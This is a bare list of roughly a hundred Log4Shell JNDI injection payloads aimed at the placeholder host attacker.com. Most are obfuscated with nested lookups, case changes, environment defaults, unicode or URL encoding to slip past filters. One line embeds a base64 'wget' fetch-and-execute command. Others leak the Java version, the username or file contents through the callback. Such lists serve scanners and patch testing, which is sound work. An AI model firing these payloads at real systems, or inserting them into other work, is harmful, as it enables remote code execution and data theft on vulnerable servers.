${jndi:ldap://example.com/a}
${jndi:ldap://127.0.0.1/a}
${jndi:ldap://localhost/a}
${jndi:ldap://attacker.com:1389/Basic/Command/Base64/d2dldCBhdHRhY2tlci5jb20veDBp}
${jndi:ldap://attacker.com:1389/a}
${jndi:ldap://attacker.com:1389}
${jndi:dns://attacker.com:1389/a}
${jndi:dns://attacker.com:1389}
${jndi:rmi://attacker.com:1389/a}
${jndi:rmi://localhost:1389/a}
${jndi:rmi://attacker.com:1389}
${jndi:http://attacker.com:1389/a}
${jndi:https://attacker.com:1389/a}
${jndi:ldaps://attacker.com:1389/a}
${jndi:ldap://attacker.com#evil.com:1389/a}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.com:1389/a}
${${::-j}ndi:rmi://attacker.com:1389/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker.com:1389/a}
${${lower:jndi}:${lower:rmi}://attacker.com:1389/a}
${${lower:${lower:jndi}}:${lower:rmi}://attacker.com:1389/a}
${${lower:j}${lower:n}${lower:d}i:${lower:r}m${lower:i}}://attacker.com:1389/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attacker.com:1389/a}
${jndi:ldap://127.0.0.1#attacker.com:1389/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//attacker.com:1389/a}
${jndi:ldap://attacker.com:1389/a}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://attacker.com:1389/a}
${jndi:ldap://127.0.0.1${env:USERNAME}}
${j${env:ND:-n}di:l${env:FOO:-d}a${env:FOO:-p}://attacker.com:1389/a}
${${env:BARFOO:-j}${env:FOOBA:-n}${env:OOBAR:-d}i:l${env:FOO:-d}ap:${env:FOO:-/}/attacker.com:1389/z}
${j${k8s:k5:-ND}i:ldap://attacker.com:1389/a}
${j${main:\k5:-ND}i:ldap://attacker.com:1389/a}
${j${upper:\k5:-ND}i:ldap://attacker.com:1389/a}
${j${sys:k5:-ND}i:ldap://attacker.com:1389/a}
${j${lower:\k5:-ND}i:ldap://attacker.com:1389/a}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}${date:':'}${date:'l'}${date:'d'}${date:'a'}${date:'p'}${date:':'}${date:'/'}${date:'/'}attacker.com:1389/a}
${${what:ever:-j}${what:ever:-n}${what:ever:-d}${what:ever:-i}${what:ever:-:}${what:ever:-l}${what:ever:-d}${what:ever:-a}${what:ever:-p}${what:ever:-:}${what:ever:-/}${what:ever:-/}attacker.com:1389/a}
${jndi:ldap://attacker.com:1389/a}
${${env:BARFOO:-j}${env:FOOBA:-n}${env:OOBAR:-d}i:ldap://attacker.com:1389/a}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${lower:d}${lower:a}${lower:p}://attacker.com:1389/a}
${\u006a\u006e\u0064\u0069:ldap://attacker.com:1389/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}ldap${env:ENV_NAME:-:}//attacker.com:1389/a}
${${sys:SYS_NAME:-j}ndi${sys:SYS_NAME:-:}ldap${sys:SYS_NAME:-:}//attacker.com:1389/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com:1389/z}
${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-i:}}ldap://attacker.com:1389/z}
${j${main:\k5:-ND}${spring:k5:-${123%25ff:-i:}}ldap://attacker.com:1389/z}
${j${sys:\k5:-ND}${log4j:k5:-${123%25ff:-i:}}ldap://attacker.com:1389/z}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/a}
${${base64:JA==}${base64:ewoJIm5hbWUiIDogIm5vdGlmeWRvbWFpbnMiLAoJInRpdGxlIiA6ICJQdWJsaWMgRG9tYWlucyIsCgkiZG9tYWlucyIgOiBbImV4YW1wbGUuY29tIl0KfQo=}${env:BARFOO:-j}${env:FOOBA:-n}${env:OOBAR:-d}i:ldap://attacker.com/a}
${${env:BARFOO:-j}${env:FOOBA:-n}${env:OOBAR:-d}i:ldap://attacker.com/a}
${${file:../../../../../../../../../../etc/hosts}:-j}ndi:${${hostName}:-l}dap://attacker.com/a
${${env:BARFOO:-j}${env:FOOBA:-n}${env:OOBAR:-d}i:${env:BARFOO:-l}${env:FOOBA:-d}${env:OOBAR:-a}${env:BARFOO:-p}${env:FOO:-:}${env:FOOBA:-/}${env:OOBAR:-/}attacker.com/a}
${${env:BARFOO:-j}${env:FOOBA:-n}${env:OOBAR:-d}i:${env:BARFOO:-l}${env:FOOBA:-d}${env:OOBAR:-a}${env:BARFOO:-p}://attacker.com/a}
${${ctx:-j}ndi:ldap://attacker.com:1389/a}
${jndi:iiop://attacker.com:1389/Target}
${${env:USER:-j}ndi${env:USER:-:}${env:USER:-l}dap${env:USER:-:}//attacker.com:1389/a}
${${env:BARFOO:-j}ndi${env:FOOBA:-:}ldap://attacker.com:1389/z}
${${upper:j}${upper:n}${upper:d}${upper:i}:${upper:r}m${upper:i}://attacker.com:1389/a}
${${lookup:l}${lookup:d}${lookup:a}${lookup:p}://attacker.com:1389/a}
${${date:Y}${date:m}${date:d}:ldap://attacker.com/z}
${${date:Y}${date:m}${date:d}${date:H}:ldap://attacker.com/z}
${${date:Y}${date:m}${date:d}${date:H}${date:M}:ldap://attacker.com/z}
${${date:l}da${date:p}://attacker.com/z}
${${date:Y}nd${date:i}:${date:l}da${date:p}://attacker.com/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://attacker.com/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'r'}${date:'m'}${date:'i'}://attacker.com/z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'d'}${date:'n'}${date:'s'}://attacker.com/z}
${${date:d}n${date:d}i:${date:l}dap://attacker.com/z}
${${date:h}t${date:t}p:${date:l}dap://attacker.com/z}
${${sys:BARFOO:-j}${sys:FOOBA:-n}${sys:OOBAR:-d}i:ldap://attacker.com:1389/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/a}
$%7Bjndi:ldap://attacker.com:1389/a%7D
%24%7Bjndi:ldap://attacker.com:1389/a%7D
${jndi:ldap://${sys:java.version}.attacker.com:1389/a}
${${env:NaN:-j}${env:NaN:-n}${env:NaN:-d}${env:NaN:-i}:${env:NaN:-l}${env:NaN:-d}${env:NaN:-a}${env:NaN:-p}://attacker.com:1389/a}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//attacker.com:1389/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker.com:1389/a}
${jn${upper:d}i:ldap://attacker.com:1389/a}
${jnd${upper:i}:ldap://attacker.com:1389/a}
${j${upper:n}di:ldap://attacker.com:1389/a}
${${upper:j}ndi:ldap://attacker.com:1389/a}
${jndi:ldap${upper::}//attacker.com:1389/a}
${${env:a:-j}ndi:ldap://attacker.com:1389/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com:1389/a}
${${env:a:-j}ndi${env:b:-:}${env:c:-l}dap${env:d:-:}//attacker.com:1389/a}
${${env:e:-j}${env:f:-n}${env:g:-d}${env:h:-i}:${env:i:-l}${env:j:-d}${env:k:-a}${env:l:-p}://attacker.com:1389/a}
${j${env:l:-n}di:ldap://attacker.com:1389/a}
${jn${env:m:-d}i:ldap://attacker.com:1389/a}
${jnd${env:n:-i}:ldap://attacker.com:1389/a}
${jndi${env:o:-:}ldap://attacker.com:1389/a}
${jndi:l${env:p:-d}ap://attacker.com:1389/a}
${jndi:ld${env:q:-a}p://attacker.com:1389/a}
${jndi:lda${env:r:-p}://attacker.com:1389/a}
${jndi:ldap${env:s:-:}//attacker.com:1389/a}
${jndi:ldap:${env:t:-/}/attacker.com:1389/a}
${jndi:ldap://${env:u:-a}ttacker.com:1389/a}
${j${:(K)n}di:ldap://attacker.com:1389/a}
${jnd${:(K)i}:ldap://attacker.com:1389/a}
${j${:(k)n}di:ldap://attacker.com:1389/a}
${jnd${:(k)i}:ldap://attacker.com:1389/a}